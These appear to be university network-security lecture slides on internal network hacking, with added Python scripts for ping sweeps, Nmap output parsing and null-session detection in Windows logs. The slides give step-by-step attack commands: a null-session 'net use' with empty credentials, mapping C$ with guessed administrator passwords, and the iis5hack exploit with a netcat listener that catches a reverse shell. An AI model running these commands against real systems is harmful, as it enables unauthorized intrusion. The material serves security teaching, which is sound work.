ITP 457 Network Security Network Hacking 101


ITP 457
Network Security
Network Hacking 101
Hacking Methodology (review)
1. Gather target information
2. Identify services and ports open on the target
3. Research the discovered services for known vulnerabilities
4. Attempt to exploit the services
5. Use the exploited services to gain additional privileges on the target
6. Repeat steps 1-5 until goals are achieved
Network Hacking
The methodology changes slightly because at this point we are looking at security from the inside: we are already connected to the network.
1. Gather information and map the network
2. Scan systems to see what's alive
3. Determine the services running
4. Attempt to penetrate the systems (if you want to)
Gathering Information
Upon connection to the network, check your IP address (normally assigned automatically by DHCP):
- Windows: ipconfig (ipconfig /all shows the full list below; plain ipconfig omits the DHCP and DNS servers)
- Linux: ifconfig (or ip addr on current distributions)
Useful information from ipconfig /all:
- Physical Address: your computer's MAC address
- IP Address: the IP address assigned to your computer
- Subnet Mask: together with the IP address, defines which addresses are on your local network (and therefore the range you will sweep)
- Default Gateway: the router used to reach IP addresses outside the local network
- DHCP Server: the computer that hands out IP addresses
- DNS Servers: the computers that translate domain names to IP addresses
ipconfig /all identifies between one and three computers without any scanning (DHCP server, DNS server, gateway). On small networks they are often the same box.
"Knock-knock"
Ping sweep
- Single command: ping host
- Ping sends ICMP "echo request" packets; a reply means the host is reachable (alive)
- Host can be an IP or a domain name (e.g. www.google.com)
- Windows sends four requests and stops; Linux keeps pinging until you press Ctrl-C unless you pass -c <count>
We want to see all the hosts on our particular network, not one host at a time:
- Nmap (or Umit, its GUI front end)
- nmap -sP <target range>, e.g. nmap -sP 192.168.0.0/24
- Current Nmap versions call this -sn (host discovery, no port scan); -sP is still accepted as an alias
- Caveat: a host that drops ICMP looks dead to ping. Run as root/Administrator on the local segment, Nmap discovers hosts with ARP requests instead, which a host firewall cannot filter; as an unprivileged user it falls back to TCP connects to ports 80 and 443
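The two slides above (reading ipconfig, then sweeping the local range) as one worked script. This is an added example, not code from the course: it parses the fields the ipconfig slide lists out of `ipconfig /all` output, derives the subnet to sweep from the IP address and mask, and pings the range in parallel. The ipconfig text and every address in it are constructed sample data, and the function names are my own.

```python
"""Added example, not from the original slides: pull the fields the ipconfig
slide lists out of `ipconfig /all` output, turn IP + subnet mask into the range
to sweep, and ping that range in parallel. The ipconfig text and addresses
below are constructed sample data."""
import ipaddress
import platform
import re
import subprocess
from concurrent.futures import ThreadPoolExecutor

# Constructed `ipconfig /all` output (made-up addresses).
SAMPLE_IPCONFIG = """
Windows IP Configuration

Ethernet adapter Local Area Connection:

   Physical Address. . . . . . . . . : 00-0C-29-3A-7B-1E
   DHCP Enabled. . . . . . . . . . . : Yes
   IP Address. . . . . . . . . . . . : 192.168.0.100
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.0.1
   DHCP Server . . . . . . . . . . . : 192.168.0.1
   DNS Servers . . . . . . . . . . . : 192.168.0.2
                                       192.168.0.3
"""

# ipconfig label -> key. "IPv4 Address" is the label on Vista and later.
FIELDS = {"Physical Address": "mac", "IP Address": "ip", "IPv4 Address": "ip",
          "Subnet Mask": "mask", "Default Gateway": "gateway",
          "DHCP Server": "dhcp", "DNS Servers": "dns"}
KV_RE = re.compile(r"^\s*([A-Za-z0-9 -]+?)[ .]*: (.+?)\s*$")
IP_RE = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s*$")   # wrapped DNS line


def parse_ipconfig(text):
    """Return {'mac','ip','mask','gateway','dhcp','dns':[...]} from ipconfig /all text."""
    info = {"dns": []}
    last = None
    for line in text.splitlines():
        kv = KV_RE.match(line)
        if kv:
            last = FIELDS.get(kv.group(1).strip())
            value = kv.group(2).split("(")[0].strip()   # Vista+ appends "(Preferred)"
            if last == "dns":
                info["dns"].append(value)
            elif last:
                info[last] = value
        elif last == "dns" and IP_RE.match(line):      # second DNS server on its own line
            info["dns"].append(IP_RE.match(line).group(1))
    return info


def known_hosts(info):
    """The 1-3 machines ipconfig names without any scanning (often one box)."""
    named = [info.get("gateway"), info.get("dhcp"), *info["dns"]]
    return sorted({h for h in named if h}, key=ipaddress.ip_address)


def sweep_range(ip, mask):
    """IP + mask -> every host address on the local subnet (no network/broadcast)."""
    net = ipaddress.ip_network(f"{ip}/{mask}", strict=False)
    return [str(h) for h in net.hosts()]


def system_ping(host, timeout_s=1):
    """One ICMP echo request via the OS ping; True only if a reply came back.
    Hosts that drop ICMP look dead here; Nmap's ARP-based -sn on the local
    segment does not have that blind spot."""
    if platform.system() == "Windows":
        cmd = ["ping", "-n", "1", "-w", str(timeout_s * 1000), host]
    else:
        cmd = ["ping", "-c", "1", "-W", str(timeout_s), host]
    try:
        return subprocess.run(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
                              timeout=timeout_s + 2).returncode == 0
    except (subprocess.TimeoutExpired, FileNotFoundError):
        return False


def ping_sweep(hosts, pinger=system_ping, workers=64):
    """Ping all hosts concurrently; return those that answered, in address order."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return [h for h, up in zip(hosts, pool.map(pinger, hosts)) if up]


if __name__ == "__main__":
    info = parse_ipconfig(SAMPLE_IPCONFIG)   # live: subprocess.run(["ipconfig", "/all"], capture_output=True, text=True).stdout
    print("known without scanning:", known_hosts(info))
    targets = sweep_range(info["ip"], info["mask"])
    print(f"sweeping {len(targets)} hosts from {targets[0]} to {targets[-1]}")
    for host in ping_sweep(targets):
        print("alive:", host)
```

The `pinger` parameter exists so the sweep logic can be exercised without touching the network (pass in any callable that answers True/False per host); with the default it shells out to the platform's ping with the right one-request flags for Windows and Linux.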
Ping sweep vs. port scanning
Why not start with port scanning?
- A ping sweep is normally benign and far less likely to get you in trouble or noticed; it is still logged by routers and firewalls, so "benign" does not mean "invisible"
- Port scanning is almost always seen as malicious and is exactly what intrusion detection systems alert on
- Limit the amount of time you spend port scanning by scanning only the systems that are alive
- There may also be multiple subnets (multiple parts of the network), some of them unoccupied. A ping sweep quickly shows whether a particular IP range is in use at all.
Determine Running Systems
- Port scan the system that you want to break into
- Nmap gives a great report, including the port numbers and the service on each port (nmap -sV also grabs the version banner), which is very useful for determining what is vulnerable
- Nmap will also try to tell you what operating system the target is running (nmap -O)
- Is it always reliable? No. OS detection is a fingerprint match against a database and may return several guesses or none; service versions come from banners, which an administrator can change. Treat both as hints and confirm them before picking an exploit.
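The report the slide describes, reduced to what the next step needs: an added example (not course code) that parses Nmap's grepable output (`-oG`) into open ports, service names, version banners and the OS guess per host, and emits the rows you would look up in a vulnerability database. The scan output is constructed sample data with made-up hosts and banners; the helper names are my own.

```python
"""Added example, not from the original slides: read Nmap's grepable output
(-oG) for the hosts found alive and turn it into the list of open ports,
service names, version banners and OS guesses that the next step (researching
vulnerabilities) needs. The scan output below is constructed sample data."""
import ipaddress

# Constructed `nmap -sV -O -oG` output for two hosts (made-up addresses/banners).
# Each port entry is port/state/proto/owner/service/rpc/version; Nmap writes any
# "/" inside a field as "|", so splitting on "/" is safe.
SAMPLE_GNMAP = """# Nmap 7.94 scan initiated as: nmap -sV -O -oG scan.gnmap 192.168.0.0/24
Host: 192.168.0.1 ()\tStatus: Up
Host: 192.168.0.1 ()\tPorts: 53/open/tcp//domain//dnsmasq 2.80/, 80/open/tcp//http//lighttpd 1.4.54/\tIgnored State: closed (998)
Host: 192.168.0.106 ()\tStatus: Up
Host: 192.168.0.106 ()\tPorts: 80/open/tcp//http//Microsoft IIS httpd 5.0/, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (996)\tOS: Microsoft Windows 2000
# Nmap done -- 256 IP addresses (2 hosts up) scanned
"""

PORT_FIELDS = ("port", "state", "proto", "owner", "service", "rpc", "version")


def parse_gnmap(text):
    """Return {ip: {'ports': [...open ports...], 'os': guess-or-None}}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue                                   # comments and summary lines
        fields = dict(f.split(": ", 1) for f in line.split("\t"))
        ip = fields["Host"].split()[0]                 # "192.168.0.106 ()" -> address
        rec = hosts.setdefault(ip, {"ports": [], "os": None})
        if "OS" in fields:
            rec["os"] = fields["OS"]                   # a fingerprint guess, not a fact
        for entry in filter(None, fields.get("Ports", "").split(", ")):
            port = dict(zip(PORT_FIELDS, entry.split("/")))
            if port["state"] == "open":                # skip filtered/closed
                rec["ports"].append({"port": int(port["port"]), "proto": port["proto"],
                                     "service": port["service"], "version": port["version"]})
    return hosts


def services_to_research(hosts):
    """(ip, port, service, version) rows to look up in a vulnerability database.
    An empty version means -sV got no usable banner; research the service alone."""
    rows = []
    for ip in sorted(hosts, key=ipaddress.ip_address):
        for p in hosts[ip]["ports"]:
            rows.append((ip, p["port"], p["service"], p["version"]))
    return rows


if __name__ == "__main__":
    scan = parse_gnmap(SAMPLE_GNMAP)
    for ip, port, service, version in services_to_research(scan):
        print(f"{ip}:{port} {service:14} {version or '(no banner)'}  os={scan[ip]['os']}")
```

Note that a filtered port (3389 in the sample) is dropped: it tells you a firewall is in the way, not that a service is reachable, so it is not a research target yet.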
Breaking in
- Once you've discovered what services are running, you have to see which are vulnerable
- Determine which service you want to break, and find a vulnerability
- Places to look:
  www.securityfocus.com (the BugTraq ID database these slides cite; it is no longer maintained, so for current entries also check nvd.nist.gov and exploit-db.com)
Null Session Hack
- One of the oldest tricks for Windows 2000
- Lets you enumerate the users of a Win2k machine anonymously and then, with an administrator's credentials, map any hard disk mounted in the machine as a network drive on the hacker's machine
- Relies on the SMB IPC$ share accepting a "null" (anonymous) session; with the Windows 2000 default RestrictAnonymous=0, that anonymous session may list users, groups and shares
- First, determine the IP address of the Windows 2000 machine
  Example: 192.168.0.106
Null Session Hack Cont'd
Establish the null session:
  net use \\ipaddress\ipc$ "" /u:""
- This command connects to the IPC$ share with an empty password and an empty username, which is the null session (/u: is short for /user:)
Get the list of usernames:
- The program DumpSec will give you the usernames and a whole lot more
  http://www.somarsoft.com/cgibin/download.pl?DumpAcl
- Go to "Select Computer", and enter the computer address
- Go to "Dump Users as Column", and it will give you options to add more information to the report
DumpSec
Map the network drive
- The command "net use" can also map the victim's machine as a network drive on your computer, through the hidden administrative shares (C$, D$, ADMIN$) that Windows creates for every fixed disk
- Caveat: you must know an administrator's username and password, because only members of Administrators can connect to the $ shares
- In our case, the user "Bob" does not have a password, typical for insecure computers
- Another common one: username "Administrator", password "Password"
- The command:
  net use Z: \\192.168.0.106\c$ "password" /u:"username"
- Try the usernames DumpSec listed; the ones in the Administrators group are the ones that matter here
Golly!
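The defender's view of the two steps above, as an added example that is not part of the course material: given a Windows Security log export, it flags null sessions (anonymous network logons and anonymous IPC$ connections) and administrative-share mappings (C$, D$, ADMIN$) from remote addresses. The event IDs are the current ones (4624 for a logon, 5140 for share access; Windows 2000 logged the network logon as event 540), the CSV column layout is assumed, and the log rows are constructed.

```python
"""Added example, not from the original slides: the defender's view of the two
steps above. Given a Windows Security log export, flag null sessions (anonymous
network logons / IPC$ connections) and administrative-share mappings (C$, D$,
ADMIN$) from remote addresses. Event IDs are the current ones (4624 logon,
5140 share access; Windows 2000 logged the logon as 540). The CSV layout is
assumed and the log rows are constructed sample data."""
import csv
import io

ADMIN_SHARES = {"C$", "D$", "ADMIN$", "IPC$"}
ANON = "ANONYMOUS LOGON"

# Constructed CSV export: EventID,TimeCreated,AccountName,LogonType,SourceIP,ShareName
SAMPLE_LOG = r"""EventID,TimeCreated,AccountName,LogonType,SourceIP,ShareName
4624,2004-03-02T10:01:05,ANONYMOUS LOGON,3,192.168.0.100,
5140,2004-03-02T10:01:06,ANONYMOUS LOGON,,192.168.0.100,\\*\IPC$
4624,2004-03-02T10:03:11,Bob,3,192.168.0.100,
5140,2004-03-02T10:03:12,Bob,,192.168.0.100,\\*\C$
4624,2004-03-02T10:05:00,alice,2,127.0.0.1,
5140,2004-03-02T10:05:40,alice,,192.168.0.50,\\*\Public
"""


def parse_log(text):
    """CSV export -> list of dicts (one per event)."""
    return list(csv.DictReader(io.StringIO(text)))


def share_name(path):
    r"""'\\*\C$' -> 'C$' (the share part of the UNC path, upper-cased)."""
    return path.rsplit("\\", 1)[-1].upper() if path else ""


def detect(events):
    """Return (kind, source_ip, account, share) alerts.
    kind is 'null_session' (anonymous network logon or anonymous IPC$ connect)
    or 'admin_share_mapped' (a $ share opened from a remote address)."""
    alerts = []
    for e in events:
        eid, who, src = e["EventID"], e["AccountName"], e["SourceIP"]
        anon = who.upper() == ANON
        if eid == "4624" and e["LogonType"] == "3" and anon:   # type 3 = network logon
            alerts.append(("null_session", src, who, ""))
        elif eid == "5140":
            share = share_name(e["ShareName"])
            if share not in ADMIN_SHARES or src.startswith("127."):
                continue                          # ordinary share, or local access
            if share == "IPC$":
                if anon:                          # authenticated IPC$ use is normal
                    alerts.append(("null_session", src, who, share))
            else:
                alerts.append(("admin_share_mapped", src, who, share))
    return alerts


def sources_by_kind(alerts):
    """{kind: sorted source IPs}: a quick summary of who did what."""
    out = {}
    for kind, src, _who, _share in alerts:
        out.setdefault(kind, set()).add(src)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    alerts = detect(parse_log(SAMPLE_LOG))
    for kind, src, who, share in alerts:
        print(f"{kind:20} from {src:15} as {who!r} {share}")
    print(sources_by_kind(alerts))
```

Two caveats for anyone deploying this logic: event 5140 only appears when the "Audit File Share" policy is enabled, and on the Windows 2000 side the fix for the enumeration step is RestrictAnonymous=2 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, which refuses the null session outright.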
We want more!
- We've established a remote drive connection, but we cannot run any commands
- We need either a remote shell (Windows command prompt) or a remote window (VNC or Terminal Services)
- A shell is easier and does not require a lot of bandwidth
Remember the port scanning?
- IIS was installed, version 5.0
- So let's take a look and see what's available:
  http://www.securityfocus.com/bid/2674/info
  (BID 2674 is the IIS 5.0 ".printer" ISAPI extension buffer overflow, fixed by Microsoft bulletin MS01-023; the target has to be unpatched for this to work)
- Download IIS5hack from the exploit section
- You will also need netcat:
  http://www.vulnwatch.org/netcat/nc111nt.zip
- Use the command: nc -l -p 1111
  This tells netcat to listen on port 1111 and wait for the victim to connect back to you
The hack!
- With netcat running, open another command prompt and enter the command:
  iis5hack.exe victim-ip your-ip port-number
- Example:
  iis5hack.exe 192.168.0.106 192.168.0.100 1111
- This will open a remote shell in the netcat window: the exploit makes the victim's cmd.exe connect out to your-ip:port-number, where netcat is listening
- MAKE SURE THE WINDOWS FIREWALL IS TURNED OFF on the machine running netcat, or the connect-back from the victim is blocked and nothing ever appears in the window! (Windows 2000 itself has no built-in firewall; the one that bites you is on your own XP-or-later attack box.)
What have you learned?
- The methodology of a hack
- How to remotely map a drive from a Windows 2000 machine
- How to hack IIS 5.0
Your lab
- Find another way to hack into a Windows 2000 machine
- Find a way to hack into the Windows XP SP0 machine
- Give me step-by-step instructions on how you did it. What sites did you go to? What tools did you use?